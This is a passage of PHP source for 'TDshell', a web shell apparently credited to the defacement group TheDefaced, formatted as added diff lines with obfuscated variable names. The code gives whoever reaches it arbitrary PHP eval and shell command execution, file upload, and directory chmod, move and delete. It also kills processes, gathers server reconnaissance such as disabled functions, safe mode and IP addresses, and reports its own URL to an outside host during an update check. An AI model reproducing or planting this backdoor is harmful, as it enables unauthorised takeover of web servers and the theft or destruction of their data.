" . $this->make_link("list", array("name" => $_2211b5dc6bb7947adcb0bf14cee6591e), "Click here to go back.")); + } + @header("Cache-Control: public, must-revalidate"); + @header("Content-Type: application/octet-stream"); + @header("Content-Length: " . (string)filesize($_d3befca3813d65aff84c2353e705a0dd)); + @header('Content-Disposition: attachment; filename="'.basename($_d3befca3813d65aff84c2353e705a0dd).'"'); + @header("Content-Transfer-Encoding: binary"); + @readfile($_d3befca3813d65aff84c2353e705a0dd); + exit; + } + else + { + $this->process("file", array("name" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "view")); + return FALSE; + }; + break; + case "dir": + $_2e5c25529adea7d7ad4802936aee0b48 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['act']; + $_d3befca3813d65aff84c2353e705a0dd = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['name']; + if (empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $this->out("
Error: no act was specified
"); + return FALSE; + }; + if ($_2e5c25529adea7d7ad4802936aee0b48 == "info") + { + if ((@is_dir($_d3befca3813d65aff84c2353e705a0dd)) && (@is_readable($_d3befca3813d65aff84c2353e705a0dd . DIRECTORY_SEPARATOR))) + { + $_d69e2bdf98584fc6cce9c9f9a9eb8b6a = listDir($_d3befca3813d65aff84c2353e705a0dd . DIRECTORY_SEPARATOR); + $this->out(' + + + + + + +
+
+ ' . processdir($_d3befca3813d65aff84c2353e705a0dd) . ' +
+
+ + + + + +
+
Directory Information
+ + + + + + + +
+ Files: ' . @count($_d69e2bdf98584fc6cce9c9f9a9eb8b6a['FILES']) . ' +
+ Subdirectories: ' . @count($_d69e2bdf98584fc6cce9c9f9a9eb8b6a['DIRS']) . ' +
+ 		+
Directory Actions
+ + + + + + + + + + +
+ + ' . $this->make_link("dir", array("act" => "chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[chmod]") . ' + +
+ + ' . $this->make_link("dir", array("act" => "move", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[move]") . ' + +
+ + ' . $this->make_link("dir", array("act" => "delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[delete]") . ' + +
+
+
'); + } + else + { + $this->out("
Directory is invalid.
"); + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "chmod") + { + if (!@is_dir($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the directory does not exist or could not be read from.
"); + return FALSE; + }; + $_4efbfa502ea6e58b84de1cdc04aecadf = $_POST['newmode']; + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + if (empty($_4efbfa502ea6e58b84de1cdc04aecadf)) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".@substr(@decoct(@fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . '
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + } + else + { + $_4efbfa502ea6e58b84de1cdc04aecadf = @intval($_4efbfa502ea6e58b84de1cdc04aecadf); + $_d3befca3813d65aff84c2353e705a0dd = @base64_encode($_d3befca3813d65aff84c2353e705a0dd); + $_16d3c4cdd343a37db4994c3591c83993 = "chmod (base64_decode('$_d3befca3813d65aff84c2353e705a0dd'), 0$_4efbfa502ea6e58b84de1cdc04aecadf);"; + if (eval($_16d3c4cdd343a37db4994c3591c83993) === FALSE) + { + $_d3befca3813d65aff84c2353e705a0dd = base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $this->out("
Failed to change permissions of the directory. " . $this->make_link("file", array("dir" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "view"), " Click here to go back to the directory.") . "
"); + } + else + { + @clearstatcache(); + $_d3befca3813d65aff84c2353e705a0dd = @base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".@substr(@decoct(@fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . 'Success!
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "move") + { + $_d0b3e9370ba342bbae976cec71233e51 = $_POST['moveto']; + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + if (!isset($_POST['moveto'])) + { + $this->out("Preparing to move directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_d0b3e9370ba342bbae976cec71233e51 = @htmlspecialchars_decode($_d0b3e9370ba342bbae976cec71233e51); + if (!@rename($_d3befca3813d65aff84c2353e705a0dd, $_d0b3e9370ba342bbae976cec71233e51)) + { + $this->out("Preparing to move directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
Failed!
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $this->out("Preparing to move directory " . processdir($_d0b3e9370ba342bbae976cec71233e51) . "
Success!
" . '
"move", "name" => $_d0b3e9370ba342bbae976cec71233e51), NULL, TRUE) . '" method="post">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "delete") + { + $_2a46f3328eaed89ef8402d4effba331e = $_POST['confirm_delete']; + if (!isset($_POST['confirm_delete'])) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + $this->out("Are you sure you wish to delete directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + if (!delete_directory($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("Are you sure you wish to delete directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
Failed!
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $this->out("Directory Deleted.
" . $this->make_link("list", array("name" => $_2211b5dc6bb7947adcb0bf14cee6591e), "Click here to go back.")); + }; + } + } + else + { + $this->process("dir", array("name" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "info")); + return FALSE; + }; + break; + case "sql": + $this->out("
(My)SQL Support will be added in future versions of TDshell.
"); + break; + case "eval": + $_202860a67864e2245a32e15193fe3cf4 = $_POST['evaldata']; + $_4e708563acf942967766e0209568749c = $_POST['evalmethod']; + if (empty($_202860a67864e2245a32e15193fe3cf4)) + { + $this->out('
Evaluation Console
Display in TextBox
Display normally
'); + } + else + { + $_202860a67864e2245a32e15193fe3cf4 = @stripslashes($_202860a67864e2245a32e15193fe3cf4); + if ($_4e708563acf942967766e0209568749c == "textbox") + { + @ob_start(); + eval($_202860a67864e2245a32e15193fe3cf4); + $_abeb01d5ff8f108e1106e763a15f95ed .= @ob_get_clean(); + $_abeb01d5ff8f108e1106e763a15f95ed = @htmlspecialchars($_abeb01d5ff8f108e1106e763a15f95ed); + $this->out('
Evaluation Console
Display in TextBox
Display normally
'); + } + else + { + @ob_start(); + eval($_202860a67864e2245a32e15193fe3cf4); + $_abeb01d5ff8f108e1106e763a15f95ed = @ob_get_clean(); + $this->out('
Evaluation Console
' . $_abeb01d5ff8f108e1106e763a15f95ed . '
Display in TextBox
Display normally
'); + }; + }; + break; + + case "exec": + $_2b2605084efea7c9994ec50aacf83c64 = $_POST['execdata']; + $_4e708563acf942967766e0209568749c = $_POST['execmethod']; + if (empty($_2b2605084efea7c9994ec50aacf83c64)) + { + $_2b2605084efea7c9994ec50aacf83c64 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['otherexec']; + }; + if (empty($_4e708563acf942967766e0209568749c)) + { + $_4e708563acf942967766e0209568749c = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['othermethod']; + }; + if (empty($_2b2605084efea7c9994ec50aacf83c64)) + { + $this->out('
Execution Console
Display in TextBox
Display normally
'); + } + else + { + $_2b2605084efea7c9994ec50aacf83c64 = @stripslashes($_2b2605084efea7c9994ec50aacf83c64); + if ($_4e708563acf942967766e0209568749c == "textbox") + { + @ob_start(); + echo custom_exec($_2b2605084efea7c9994ec50aacf83c64); + $_abeb01d5ff8f108e1106e763a15f95ed .= @ob_get_clean(); + $_abeb01d5ff8f108e1106e763a15f95ed = @htmlspecialchars($_abeb01d5ff8f108e1106e763a15f95ed); + $this->out('
Execution Console
Display in TextBox
Display normally
'); + } + else + { + @ob_start(); + echo custom_exec($_2b2605084efea7c9994ec50aacf83c64); + $_abeb01d5ff8f108e1106e763a15f95ed .= @ob_get_clean(); + $_abeb01d5ff8f108e1106e763a15f95ed = @htmlspecialchars($_abeb01d5ff8f108e1106e763a15f95ed); + $this->out('
Execution Console
' . $_abeb01d5ff8f108e1106e763a15f95ed . '
Display in TextBox
Display normally
'); + }; + }; + break; + + case "proc": + $_57eefc72bcbe3daf2bb185189468725a = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['do']; + if (empty($_57eefc72bcbe3daf2bb185189468725a)) + { + $_4bc9908fada98cbfd1396fceed921faa = '/^([A-Za-z0-9]*)\\s{1,}([0-9]{1,10})\\s{1,}.*[0-9]{1,}:[0-9]{2,}\\s(.*)$/'; + + if (!($_c9a15425a6e12ac0295a2b759e048768 = custom_exec("ps aux"))) + { + $this->out("
TDshell Process Manager Failed: No valid permissions.
"); + return FALSE; + }; + $_c9a15425a6e12ac0295a2b759e048768 = @explode("\n", $_c9a15425a6e12ac0295a2b759e048768); + foreach ($_c9a15425a6e12ac0295a2b759e048768 as $_6557ccde5bb0523391c98ec92365d5a9) + { + if (@preg_match($_4bc9908fada98cbfd1396fceed921faa, $_6557ccde5bb0523391c98ec92365d5a9, $_38c09efe88a67e6a5344c0bbcc44c7d4)) + { + unset($_38c09efe88a67e6a5344c0bbcc44c7d4[0]); + $_38c09efe88a67e6a5344c0bbcc44c7d4['FULL'] = $_6557ccde5bb0523391c98ec92365d5a9; + $_15241b5cdd6d57b1fac3c1eb60905cd8[] = $_38c09efe88a67e6a5344c0bbcc44c7d4; + }; + }; + natsort2d($_15241b5cdd6d57b1fac3c1eb60905cd8); + $_10626691c8b3c6af89adc170cee73ebb = ""; + $_ee1cbb2fd23ff45ac77733a06636a3c7 = ""; + foreach ($_15241b5cdd6d57b1fac3c1eb60905cd8 as $_a3ae37119660c8023a43787f58268912) + { + $_8501d6dd59b45b2159f1f73f6e17b11f = @md5(@microtime() . $_a3ae37119660c8023a43787f58268912); + $_46fc346549f1eeca72e169bb77bf12d8 = ""; + if ($_a3ae37119660c8023a43787f58268912[2] == @getmypid()) + { + $_46fc346549f1eeca72e169bb77bf12d8 = " style='background-color:#FFFFF0'"; + }; + if ($_a3ae37119660c8023a43787f58268912[1] == @get_current_user()) + { + $_a3ae37119660c8023a43787f58268912[1] = "$_a3ae37119660c8023a43787f58268912[1]"; + $_10626691c8b3c6af89adc170cee73ebb .= "$_a3ae37119660c8023a43787f58268912[1]$_a3ae37119660c8023a43787f58268912[2]$_a3ae37119660c8023a43787f58268912[3]" . $this->make_link("proc", array("do" => "kill", "pid" => $_a3ae37119660c8023a43787f58268912[2]), "KILL") . " - " . '[+]
' . $_a3ae37119660c8023a43787f58268912['FULL'] . '
' . ""; + } + else + { + $_ee1cbb2fd23ff45ac77733a06636a3c7 .= "$_a3ae37119660c8023a43787f58268912[1]$_a3ae37119660c8023a43787f58268912[2]$_a3ae37119660c8023a43787f58268912[3]" . $this->make_link("proc", array("do" => "kill", "pid" => $_a3ae37119660c8023a43787f58268912[2]), "KILL") . " - " . '[+]
' . $_a3ae37119660c8023a43787f58268912['FULL'] . '
' . ""; + }; + }; + $this->out("" . $_10626691c8b3c6af89adc170cee73ebb . $_ee1cbb2fd23ff45ac77733a06636a3c7 . "
UserPIDCommandActions
"); + } + else + { + $_6cac525ed87733d2d6bf528558ef4c06 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['pid']; + if (custom_exec("kill " . @intval($_6cac525ed87733d2d6bf528558ef4c06)) === FALSE) + { + $this->out("
Could not kill process ID " . @intval($_6cac525ed87733d2d6bf528558ef4c06) . "
"); + } + $this->process("proc"); + }; + break; + case "update": + $_c14f19c15d50e72a5733c0ad88a035b9 = @fopen("http://tdshell.thedefaced.org/latest.php?chk=" . @base64_encode(current_URI()), "r"); + while ((!@feof($_c14f19c15d50e72a5733c0ad88a035b9)) && ($_c14f19c15d50e72a5733c0ad88a035b9)) + { + $_45e1fe4475ff3a7426e094d9638a5f22 .= @fread($_c14f19c15d50e72a5733c0ad88a035b9, 1024); + }; + if ($_45e1fe4475ff3a7426e094d9638a5f22 == @md5($this->TDshell_version)) + { + $this->out("Your version of TDshell is up to date."); + } + elseif (empty($_45e1fe4475ff3a7426e094d9638a5f22)) + { + $this->out("Error: Failed to retrieve latest version."); + } + else + { + $this->out("Your version of TDshell is out of date. Please replace your current shell with the latest version located here."); + }; + break; + case "mkdir": + $_0b63e7829d4893613b17575c517db17d = $_POST['mkdir']; + if (empty($_0b63e7829d4893613b17575c517db17d)) + { + $this->out("
Could not create directory, empty name provided.
"); + $this->process("list"); + } + else + { + if (!@mkdir($_0b63e7829d4893613b17575c517db17d, 0777)) + { + $this->out("
Could not create directory, permission denied.
"); + $this->process("list"); + } + else + { + @clearstatcache(); + $this->process("list", array("dir" => $_0b63e7829d4893613b17575c517db17d)); + }; + }; + break; + case "godir": + $_942922064772e69fea37ad32e72dfd70 = $_POST['godir']; + $this->process("list", array("dir" => $_942922064772e69fea37ad32e72dfd70)); + break; + case "mkfile": + $_0dc4ed3391208760f7f43fc80a2441e5 = $_POST['mkfile']; + if (!@fopen($_0dc4ed3391208760f7f43fc80a2441e5, "w")) + { + $this->out("
Could not make file, permission denied.
"); + $this->process("list"); + } + else + { + $this->process("file", array("act" => "edit", "name" => $_0dc4ed3391208760f7f43fc80a2441e5)); + }; + break; + case "gofile": + $_cacb8c32699f649131f8eaa04c25222c = $_POST['gofile']; + $this->process("file", array("act" => "view", "name" => $_cacb8c32699f649131f8eaa04c25222c)); + break; + case "upload": + $_031d648129f7450af0529cbf0825fd58 = $_POST['destination']; + $_8add29b89df2cfe7786dd8ba967ff1e2 = $_031d648129f7450af0529cbf0825fd58 . @basename($_FILES['file']['name']); + if (@move_uploaded_file($_FILES['file']['tmp_name'], $_8add29b89df2cfe7786dd8ba967ff1e2)) + { + $this->process("file", array("act" => "edit", "name" => $_8add29b89df2cfe7786dd8ba967ff1e2)); + } + else + { + $this->out("
Error uploading file!
"); + }; + break; + case "ping": + $this->out("be457c74983226e519e3564f8699eb4e"); + break; + case "alias": + $_93ddad4f44750399cbee70b6508b6ea3 = $_POST['alias']; + $this->process("exec", array("otherexec" => $_93ddad4f44750399cbee70b6508b6ea3, "othermethod" => "textbox")); + break; + case "": + $this->process("list", $_ec4ae32bf3e3a09bae7ff3e84ebbc667); + break; + case "credits": + $this->out("" . $this->TDshell_version . " - Credits
"); + $this->out("www.TheDefaced.org
+Debug: For critical development and idea planning of the shell
+x2Fusion: For crutial ideas and planning of the development of the shell
+Kr3w: For inspirational ideas that contributed greatly to the project
+Tr3mbl3r: With massive ideas for development and features that he planned

TDshell homepage located here."); + break; + case @base64_decode("OTQ1VU84VUVSLTQzOFVFOVJJT0dILTVZUlRHVTlJT1JUTkhHRTVULTQzNVRVR0ZJNUgzNFRBVzk4NC00LTMtMzQ1VERGUw=="): + $this->out(base64_decode("QSBCYW5zaGVlIFRoZSBXaWx0DQpDYW5jZWwgQW5kIFJlYWwNCkhhdCBUaGlucyBUd28NCkVhdGVuIE91dHMgWW93DQoNCkk0U0g4SUZI")); + break; + default: + @ob_start(); + print_r($_ec4ae32bf3e3a09bae7ff3e84ebbc667); + $_bb8084d9c33052d4e3d1354f2746b6bb = @ob_get_clean(); + $this->out("Error: could not process your request; the act does not exist.
Act: $_2e5c25529adea7d7ad4802936aee0b48\n$_bb8084d9c33052d4e3d1354f2746b6bb

"); + break; + }; + } + + function header() + { + $this->out_template("HTML_HEADER_MAIN"); + $this->out_template("HTML_HEADER_HEAD_PRE"); + $this->out_template("HTML_HEADER_HEAD_TITLE"); + $this->out_template("HTML_HEADER_HEAD_SCRIPT"); + $this->out_template("HTML_HEADER_HEAD_STYLE"); + $this->out_template("HTML_HEADER_HEAD_SUF"); + $this->out_template("HTML_HEADER_BODY_PRE"); + } + + function footer($_948b7576a20aa0bb3f1d2055da74156c) + { + $this->out_template("HTML_HEADER_BODY_SUF"); + $this->out(@str_replace("{TIME_TAKEN}", $_948b7576a20aa0bb3f1d2055da74156c, $this->get_template("HTML_FOOTER_MAIN"))); + } + + function out($_45e1fe4475ff3a7426e094d9638a5f22) + { + $this->TDshell_data .= $_45e1fe4475ff3a7426e094d9638a5f22; + } + + function outall() + { + echo $this->sanitize_output($this->TDshell_data); + } + + function set_template($_d3befca3813d65aff84c2353e705a0dd, $_d52f547da0e098832b6b81469d36c48b) + { + $this->TDshell_template[$_d3befca3813d65aff84c2353e705a0dd] = $_d52f547da0e098832b6b81469d36c48b; + } + + function make_link($_2e5c25529adea7d7ad4802936aee0b48, $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = array(), $_a70fd9147fda16858f57fe0479d66df0 = "", $_c8872ae6a7d8ea0f53e6e72ed2ceeac1 = FALSE) + { + if (!empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $_7622cf6629732edc545313527c803112 = "act=$_2e5c25529adea7d7ad4802936aee0b48"; + } + if (!empty($_ec4ae32bf3e3a09bae7ff3e84ebbc667)) + { + if (!empty($_ec4ae32bf3e3a09bae7ff3e84ebbc667)) + { + if (empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $_7622cf6629732edc545313527c803112 .= "args="; + } + else + { + $_7622cf6629732edc545313527c803112 .= "&args="; + }; + foreach ($_ec4ae32bf3e3a09bae7ff3e84ebbc667 as $_ddc2938d74cdbcf22f9ecfaf2f1fb5be => $_c7104b3e36401bf0c1d4a5788ac2ad69) + { + $_7622cf6629732edc545313527c803112 .= @base64_encode($_ddc2938d74cdbcf22f9ecfaf2f1fb5be . ":" . $_c7104b3e36401bf0c1d4a5788ac2ad69) . "-"; + }; + if (@substr($_7622cf6629732edc545313527c803112, -1) == "-") + { + $_7622cf6629732edc545313527c803112 = @substr($_7622cf6629732edc545313527c803112, 0, @strlen($_7622cf6629732edc545313527c803112) -1); + }; + }; + }; + $_42a6152a4d7c7d957669c6d70dc5ba87 = 'http'; + if ($_SERVER["HTTPS"] == "on") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "s"; + }; + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "://"; + if ($_SERVER["SERVER_PORT"] != "80") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["SCRIPT_NAME"]; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]; + }; + if (!$_c8872ae6a7d8ea0f53e6e72ed2ceeac1) + { + if (empty($_7622cf6629732edc545313527c803112)) + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?" . "proc=out"; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?" . $_7622cf6629732edc545313527c803112 . "&proc=out"; + }; + } + else + { + if (empty($_7622cf6629732edc545313527c803112)) + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?"; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = $_42a6152a4d7c7d957669c6d70dc5ba87 . "?" . $_7622cf6629732edc545313527c803112; + }; + }; + $_3d1e4e37e3bb032a675f9b0de015bfca = $this->get_template("HTML_REL_LINK_BEG_PRE"); + $_3581e843f20285ea83417f61211d475a = $this->get_template("HTML_REL_LINK_BEG_SUF"); + $_7ebad0a61068a13c2d289a738022186a = $this->get_template("HTML_REL_LINK_END"); + if (!$_c8872ae6a7d8ea0f53e6e72ed2ceeac1) + { + return $_3d1e4e37e3bb032a675f9b0de015bfca . $_42a6152a4d7c7d957669c6d70dc5ba87 . $_3581e843f20285ea83417f61211d475a . $_a70fd9147fda16858f57fe0479d66df0 . $_7ebad0a61068a13c2d289a738022186a; + } + else + { + return $_42a6152a4d7c7d957669c6d70dc5ba87; + }; + } + + function out_template($_d3befca3813d65aff84c2353e705a0dd) + { + $this->out($this->TDshell_template[$_d3befca3813d65aff84c2353e705a0dd]); + } + + function get_template($_d3befca3813d65aff84c2353e705a0dd) + { + return $this->TDshell_template[$_d3befca3813d65aff84c2353e705a0dd]; + } + + function sanitize_output($_5d28db41dd3b63b0ad9702e535eedd73) + { + $_c15977bdc89c079bde3a6687c20c1719 = array( + '/\>[^\S ]+/s', + '/[^\S ]+\', + '<' + ); + $_5d28db41dd3b63b0ad9702e535eedd73 = @preg_replace($_c15977bdc89c079bde3a6687c20c1719, $_0cb75167c55d51f5653f1217678b8a57, $_5d28db41dd3b63b0ad9702e535eedd73); + return $_5d28db41dd3b63b0ad9702e535eedd73; + } + function content_bottom_ext() + { + return ' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Quick Execute + + Quick Eval +


+
+ Make Directory + + Go to Directory

+

+ +
+ Make File + + Go to File +

+

+ +
+ Upload File + + Alias Commands +

+
+ + +
'; + } + function content_top_ext() + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
Server Information:
"; + $_074b7814a5770494227ce06e81ff999a = @getenv("SERVER_SOFTWARE"); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Software: " . @htmlspecialchars($_074b7814a5770494227ce06e81ff999a) . "
"; + if (($_600528b2c16959ec0b7415143daf3c2c = custom_exec("uptime"))) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Uptime: $_600528b2c16959ec0b7415143daf3c2c
"; + }; + + $_4894710f990f9bda9ef69a94d3de9a25 = @wordwrap(@php_uname(),100,"
",1); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "System Info: " . $_4894710f990f9bda9ef69a94d3de9a25 . "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Disabled Functions: "; + if('' == ($_404553cd7b56719c358d1c6d76f88164 = @ini_get('disable_functions'))) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "NONE
"; + } + else + { + $_404553cd7b56719c358d1c6d76f88164 = @explode(",", $_404553cd7b56719c358d1c6d76f88164); + $_4b61f566d85332046e5ea8c39d5595a9 = ""; + foreach ($_404553cd7b56719c358d1c6d76f88164 as $_96a32437f909f9609d8bb97987165016) + { + $_96a32437f909f9609d8bb97987165016 = @trim($_96a32437f909f9609d8bb97987165016); + $_4b61f566d85332046e5ea8c39d5595a9 .= "" . $_96a32437f909f9609d8bb97987165016 . "" . ","; + }; + $_4b61f566d85332046e5ea8c39d5595a9 = @substr($_4b61f566d85332046e5ea8c39d5595a9, 0, @strlen($_4b61f566d85332046e5ea8c39d5595a9) - 1); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "$_4b61f566d85332046e5ea8c39d5595a9
"; + }; + if(@ini_get("register_globals")) + { + $_0b72c338824fc598846641f1733ded93 = "ON
"; + } + else + { + $_0b72c338824fc598846641f1733ded93 = "OFF
"; + }; + $_4aa5a13a07418cb3b1f532b2f73d68ae = @function_exists('mysql_connect'); + $_d264811448b31fb4b2772b416c9b6342 = @function_exists('mssql_connect'); + $_4faecc09d416a70e7c85c211689f976c = @function_exists('pg_connect'); + $_8050813e45b77747b44bfa1e66edf6e1 = @function_exists('ocilogon'); + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + { + $_ff72ae8d0a7c203fdca8802a4a3d4743 = "ON (secure)"; + } + else + { + $_ff72ae8d0a7c203fdca8802a4a3d4743 = "OFF (not secure)"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "MySQL: "; + if ($_4aa5a13a07418cb3b1f532b2f73d68ae) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "MSSQL: "; + if ($_d264811448b31fb4b2772b416c9b6342) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "PostgreSQL: "; + if ($_4faecc09d416a70e7c85c211689f976c) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Oracle: "; + if ($_8050813e45b77747b44bfa1e66edf6e1) + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "ON"; + } + else + { + $_a9e5405d6581811dbff46e9ca3280bc1 .= "OFF"; + }; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Safemode: "; + $_a9e5405d6581811dbff46e9ca3280bc1 .= $_ff72ae8d0a7c203fdca8802a4a3d4743 . "
"; + $_d94dc5b08d928c237d98b0ed89179043 = @disk_free_space("./"); + $_7467c53f177b1d289f3e1b2e395b9056 = @disk_total_space("./"); + if ($_d94dc5b08d928c237d98b0ed89179043 === FALSE) {$_d94dc5b08d928c237d98b0ed89179043 = 0;} + if ($_7467c53f177b1d289f3e1b2e395b9056 === FALSE) {$_7467c53f177b1d289f3e1b2e395b9056 = 0;} + if ($_d94dc5b08d928c237d98b0ed89179043 < 0) {$_d94dc5b08d928c237d98b0ed89179043 = 0;} + if ($_7467c53f177b1d289f3e1b2e395b9056 < 0) {$_7467c53f177b1d289f3e1b2e395b9056 = 0;} + $_c3574082b118679ba0bc952292c18820 = @round(100/($_7467c53f177b1d289f3e1b2e395b9056/$_d94dc5b08d928c237d98b0ed89179043),2); + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Free: " . view_size($_d94dc5b08d928c237d98b0ed89179043) . " of " . view_size($_7467c53f177b1d289f3e1b2e395b9056) . " (" . $_c3574082b118679ba0bc952292c18820 . "%)
"; + $_a9e5405d6581811dbff46e9ca3280bc1 .= "Your IP: " . $_SERVER['REMOTE_ADDR'] . " Server IP: " . $_SERVER['SERVER_ADDR'] . "
"; + return $_a9e5405d6581811dbff46e9ca3280bc1; + } + }; +$TDshell = new _463f641c8747ebe94fafef7333a99b45; +$TDshell->TDshell_template["HTML_HEADER_MAIN"] = ""; +$TDshell->TDshell_template["HTML_HEADER_HEAD_PRE"] = ""; +$TDshell->TDshell_template["HTML_HEADER_HEAD_TITLE"] = "$_SERVER[SERVER_NAME] - TDshell by TheDefaced (www.TheDefaced.org)"; + +$TDshell->TDshell_template["HTML_HEADER_HEAD_SCRIPT"] = ''; + +$TDshell->TDshell_template["HTML_HEADER_HEAD_STYLE"] = ''; +$TDshell->TDshell_template["HTML_HEADER_HEAD_SUF"] = ""; +$TDshell->TDshell_template["HTML_REL_LINK_BEG_PRE"] = ""; +$TDshell->TDshell_template["HTML_REL_LINK_END"] = ""; + +$TDshell->TDshell_template["HTML_HEADER_BODY_PRE"] = "" . '
+ +
+ + + + + +
+
+
+ ' . $TDshell->content_top_ext() . ' +
+
+ 		+ [-] +
+
+
Checking for updates...
+
[back] [refresh]
'; +$TDshell->TDshell_template["HTML_HEADER_BODY_PRE"] .= '
'; +$TDshell->TDshell_template["HTML_HEADER_BODY_SUF"] = '
' . $TDshell->content_bottom_ext() . '
[-]
